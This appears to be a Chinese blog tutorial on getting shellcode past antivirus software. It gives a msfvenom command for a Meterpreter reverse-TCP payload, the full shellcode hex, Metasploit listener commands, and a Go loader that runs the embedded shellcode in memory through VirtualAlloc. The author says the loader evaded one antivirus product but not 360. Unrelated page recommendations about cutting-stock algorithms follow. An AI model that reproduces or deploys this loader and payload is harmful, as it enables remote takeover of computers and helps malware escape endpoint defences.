shellcode免杀之VirtualAlloc函数加载shellcode过杀软

最新推荐文章于 2025-04-04 10:22:34 发布
最新推荐文章于 2025-04-04 10:22:34 发布
阅读量1.1k 收藏 2
点赞数 1
分类专栏: 免杀专题 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_65244586/article/details/123160651
版权

0x00 实验环境

攻击机:Kali 192.168.32.128

靶机:Win7 192.168.32.139

0x01 制作shellcode

Kali执行

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.32.128 lport=8010 -f c

img

将shellcode处理成16进制,结果如下:

img

shellcode

fc4883e4f0e8cc000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d0668178180b020f85720000008b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e94bffffff5d49be7773325f3332000041564989e64881eca00100004989e549bc02001f4ac0a8208041544989e44c89f141ba4c772607ffd54c89ea68010100005941ba29806b00ffd56a0a415e50504d31c94d31c048ffc04889c248ffc04889c141baea0fdfe0ffd54889c76a1041584c89e24889f941ba99a57461ffd585c0740a49ffce75e5e8930000004883ec104889e24d31c96a0441584889f941ba02d9c85fffd583f8007e554883c4205e89f66a404159680010000041584889f24831c941ba58a453e5ffd54889c34989c74d31c94989f04889da4889f941ba02d9c85fffd583f8007d2858415759680040000041586a005a41ba0b2f0f30ffd5575941ba756e4d61ffd549ffcee93cffffff4801c34829c64885f675b441ffe7586a005949c7c2f0b5a256ffd5

0x02 建立监听

在kali建立监听

msf > use exploit/multi/handler 
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.32.128
lhost => 192.168.32.128
msf exploit(handler) > set lport 8010
lport => 8010
msf exploit(handler) > run

0x03 go语言加载shellcode免杀

go语言命令行加载shellcode 过杀软

核心代码

img

package main

import (
	"syscall"
	"unsafe"
	"encoding/hex"
	"fmt"
)

func Run(sc []byte) {
	var kernel32 = syscall.MustLoadDLL("kernel32.dll")
	var ntdll = syscall.MustLoadDLL("ntdll.dll")
	var VirtualAlloc = kernel32.MustFindProc("VirtualAlloc")
	var RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")

	addr, _, _ := VirtualAlloc.Call(0, uintptr(len(sc)), 0x1000|0x2000, 0x40)
	RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&sc[0])), uintptr(len(sc)))
	syscall.Syscall(addr, 0, 0, 0, 0)

}

func Run2(sc []byte) {

    f := func(){}  
    *(**uintptr)(unsafe.Pointer(&f)) = (*uintptr)(unsafe.Pointer(&sc))  
    var oldfperms2 uint32
    syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualProtect").Call(  
        uintptr(unsafe.Pointer(*(**uintptr)(unsafe.Pointer(&sc)))), 
      	uintptr(uint(len(sc))),
        uintptr(uint32(0x40)), 
        uintptr(unsafe.Pointer(&oldfperms2)))
    f() 
}

func main(){

    v := "fc4883e4f0e8c8000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d0668178180b0275728b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e94fffffff5d6a0049be77696e696e65740041564989e64c89f141ba4c772607ffd54831c94831d24d31c04d31c94150415041ba3a5679a7ffd5eb735a4889c141b8620400004d31c9415141516a03415141ba57899fc6ffd5eb595b4889c14831d24989d84d31c9526800024084525241baeb552e3bffd54889c64883c3506a0a5f4889f14889da49c7c0ffffffff4d31c9525241ba2d06187bffd585c00f859d01000048ffcf0f848c010000ebd3e9e4010000e8a2ffffff2f5952793900eb9b5de25f5e5f110c1b498f5584b8e2530804a38b5696df0795952a03eb1edffbd301223e5296811d2a49b2ac4778d6b1f1f6bd5d3d26c632058a7c1a57e90a909add0a70492266a200557365722d4167656e743a204d6f7a696c6c612f352e302028636f6d70617469626c653b204d53494520392e303b2057696e646f7773204e5420362e303b20574f5736343b2054726964656e742f352e303b206d736e204f7074696d697a65644945383b454e5553290d0a00c4f0e61fe1788402e61dab72d1f2756625c395f9d2f47a36864343f055a6d41b02d027a489100551cac24ee28588c230eea2930462ddd60e6253f69b29a8c896b4cbb163158c05a0b28bae259d473d9689071c7c87176b89f03334c87e17b0153f0e3ec14619a9b94eae55d9c3ac08ac6f8fceda944bde003fd8e27dea1df27e170242c4a18d767bd92b6934a8c21cb7d7ecca4b98395ad0a556c9a6040e86581e31a588537f1a1c18e38f3ea78521869ba193622f2f2114ccbe68c3efa057bb99b56f0041bef0b5a256ffd54831c9ba0000400041b80010000041b94000000041ba58a453e5ffd5489353534889e74889f14889da41b8002000004989f941ba129689e2ffd54883c42085c074b6668b074801c385c075d758585848050000000050c3e89ffdffff3139322e3136382e33322e3133300012345678"
    //v:="aaaaaa"
	a,err := hex.DecodeString(v)
    if err!= nil{
        fmt.Println(err)
    }
    //Run2(a)已不能免杀
	Run(a)
}

编译

build mian.go

生成mian.exe文件

0x04 测试免杀

放到已安装某绒和某60的win7虚机测试

这里某绒已是最新版

img

未报毒

img

360报毒

img

0x05 上线

执行bypass.exe

img

不过遗憾的是,在测试时候,已不能过360

二维下料matlab,二维下料问题剩余矩形算法的MATLAB实现
weixin_33514475的博客
03-16 3168
题主大四,在做二维下料问题的蚁群算法求解,基本思路是分两步走,通过蚁群算法得出工序列,再用剩余矩形算法进行工列。由于编程基础薄弱,在网上搜索到河海大学段付谋同学关于剩余矩形算法的论文,研读两日,但还是不得要义,主要是从刚开始i=1就走不下去了,希望各位朋友帮忙理解下算法的大致思路,万分感谢。不理解的代码位置已用红色标出,再次感谢。代码如下:size=zeros(25,2);%表示小矩形的尺寸...
矩形下料优化遗传算法_优化算法_遗传算法__算法_二维切割.zip
10-10
矩形下料优化遗传算法_优化算法_遗传算法__算法_二维切割.zip
基于遗传算法矩形
06-14
利用遗传算法解决矩形问题,具有可视化的界面,输入数据为含有矩形的长和宽的文本文,输出的结果以可视化的形式显示出来
钢管下料问题:基于Matlab的优化求解与实践
最新发布
2501_90186640的博客
04-04 1210
本文聚焦钢管下料问题,通过构建数学模型并借助Matlab编程,求解不同需求场景下的最优下料方案。详细阐述了问题分析、模型建立与求解过程,对比不同目标下的结果,为解决实际生产中的钢管下料问题提供有效方法,助力提高材料利用率和降低成本。
二维下料算法
02-26
-计算板材数的需求和剩余。 -特殊的两级优化算法. -可设置切削刀片的厚度。 -可设置优化的级别。 -可设置的切削长度。 -可设置破损宽度。 -可设任何的长度或宽度。 -可统计优化后的数字。 -非常快速的算法(解决方案,得到了几秒钟内)
基于遗传算法矩形问题求解
06-29
在分析了常用矩形优化算法的基础上,提出了一种新的改进算法,在过程中加入旋转策略和改进了的向后搜索方案。将此算法作为一种解码方法,与遗传算法相结合来求解矩形问题。算例表明了该算法能达到更好的效果。
matlab 遗传算法 一维下料问题
08-25
matlab 遗传算法 一维下料问题 非常不错 希望对各位有用
遗传算法用于二维下料问题的一些结果
simongong的专栏
08-14 8938
 最近做了这方面的事情。把自己的一些经验跟大家分享一下。遗传算法是一种优化算法,所以可以应用在很多地方。尤其是对于比较复杂或者难于求出精确解的问题,该方法给出了比较好的解决方案。二维下料问题是说,在固定宽度的板材切割下一些要求大小的目标物,使得消耗的板材长度最小。对于这个问题,可以把他抽象为这的数学模型:每一个目标物设置一个id号,这一组id号就构成了一个切割顺序。显然,在这的模型下,切割
矩形下料优化遗传算法_优化算法_遗传算法__算法_二维切割
09-11
总结来说,"矩形下料优化遗传算法"是一种基于遗传算法计算方法,用于解决二维材料切割中的问题,以最大化原料利用率并减少废料。通过对遗传算法的理解和应用,我们可以为制造业提供更为优化的生产策略...
retangleplace.rar_ matlab_ 矩形_matlab_问题matlab_矩形 matla
07-15
"问题matlab"标签揭示了这个程序是针对特定的算法实现的,可能是基于剩余矩形法,这是一种常用的策略。这种方法通常包括以下几个步骤:首先,将最大的矩形放置在板材上;然后,逐步添加较小的矩形,...
基于最低水平线方法与遗传算法矩形优化算法.rar
06-25
总结来说,"基于最低水平线方法与遗传算法矩形优化算法"是一个融合了两种优化策略的解决方案,旨在解决二维矩形布局问题。它利用了最低水平线法的局部优化和遗传算法的全局搜索,旨在找到更加经济、高效的...
MATLAB下料问题原创程序
08-20
绝对原创,效果非常好,所需种类55种,板子数799
基于遗传算法的MFC矩形UI
05-04
最近参见华中赛,选了A题,钢构问题问题解决期间用到了遗传算法,自己用VC写了一个,这个是界面部分
二维遗传算法matlab代码-Didymos-optimization:Didymos优化
05-22
二维遗传算法matlab代码DART任务优化项目 上次更新时间:2020年8月6日项目背景和当前目标 NASA的双小行星重定向测试(DART)任务涉及让飞船执行动力学冲击,以改变Dimorphos围绕母体Didymos的轨道轨迹。 所使用的航天器配备了NEXT离子推进器,虽然并不需要击中目标,但可以用作技术演示。 对于本项目,我们的目标是使用推进器找到最佳轨迹,该轨迹将导致与目标的速度差异更大,从而使Dimorphos的轨道发生更有效的变化。 除了优化DART任务的有效性外,该项目还旨在优化寻找解决方案的过程。 当前,用于寻找最佳轨迹的工具是利用一种遗传算法,该遗传算法使用Nvidia的CUDA平台来优化参数,从而导致击中星号并最大化速度差。 在开发的当前阶段,重点在于改进和验证遗传算法在寻找对星号产生影响的有效参数方面的有效性。 正在优化的参数如下 变量名 单位 描述 出行时间 秒(秒) 航天器从离开地球影响圈到受到Dimorphos撞击的行程需要多长时间,撞击日期由NASA预先确定,但发射日期很灵活,因此该变量也会影响航天器的初始位置和速度当它离开地球的势力范围时 阿尔法发射角 弧
二维遗传算法matlab代码-Machine-Learning:机器学习
05-22
二维遗传算法matlab代码微笑 Smile(统计机器智能和学习引擎)是一个快速而全面的机器学习系统。 凭借先进的数据结构和算法,Smile可提供最先进的性能。 Smile涵盖了机器学习的方方面面,包括分类,回归,聚类,关联规则挖掘,特征选择,流形学习,多维缩放,遗传算法,缺失值插补,有效的最近邻搜索等。 核心算法是用Java实现的并且自成体系。 核心核心机器学习库。 Scala Scala中的高级操作员。 数学线性代数,统计分布,假设检验,随机数生成器,序,特殊函数,各种核,距离和rbf函数。 数据解析器,用于arff,libsvm,定界文本,稀疏矩阵,微阵列基因表达数据。 图在邻接表和矩阵上的图算法。 插值一维和二维插值。 NLP自然语言处理。 基于Plot Swing的数据可视化库。 Smile有充分的文献记录,请查阅的编程指南和更多信息。 通过将以下内容添加到项目pom.xml文中,可以通过Maven中央存储库使用这些库。 <dependency> <groupId>com.github.haifengl</groupId> <artifactId>smile-core</
利用模拟退火算法和遗传算法进行矩形算法优化
06-16
在IT行业中,优化问题是一个广泛...在SF文中,可能包含了这两种算法的具体实现代码、实验结果和性能比较,进一步的研究者可以通过分析这些内容,了解并改进算法的实际应用效果,以应对更多复杂场景下的矩形问题
使用遗传算法解决一维下料问题(一、实现思路分析)
失足成万古风流人物的专栏
05-11 3571
三年前我就折腾过一维下料问题了,当时查遍百度、谷歌,阅尽硕博论文,最终采用自研算法解决了一维下料问题,详见“一维下料问题的研究”。当时也阅读了大量使用遗传算法解决该问题的论文,但由于效果比较差,最终放弃了该算法。
matlab 遗传算法 最低水平线法 二维板材下料
zhangzihneng0308的博客
01-19 2777
1、最低水平线法(参看 图2 理解) 采用相同的序规则,将板料的平面问题二维序)转化为遗传算法中的基因序列(一维序)。 2、遗传算法 使用遗传算法将随机生成的列组合,根据自己设定的目标函数,筛选出最优基因(数字列)。 3、图形化显示 绘图显示种群迭代情况和板材最优下料方案。 注:目前只实现了板材不允许旋转的料方案,允许旋转正在实现中。 ps:看的人多就上代码 ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值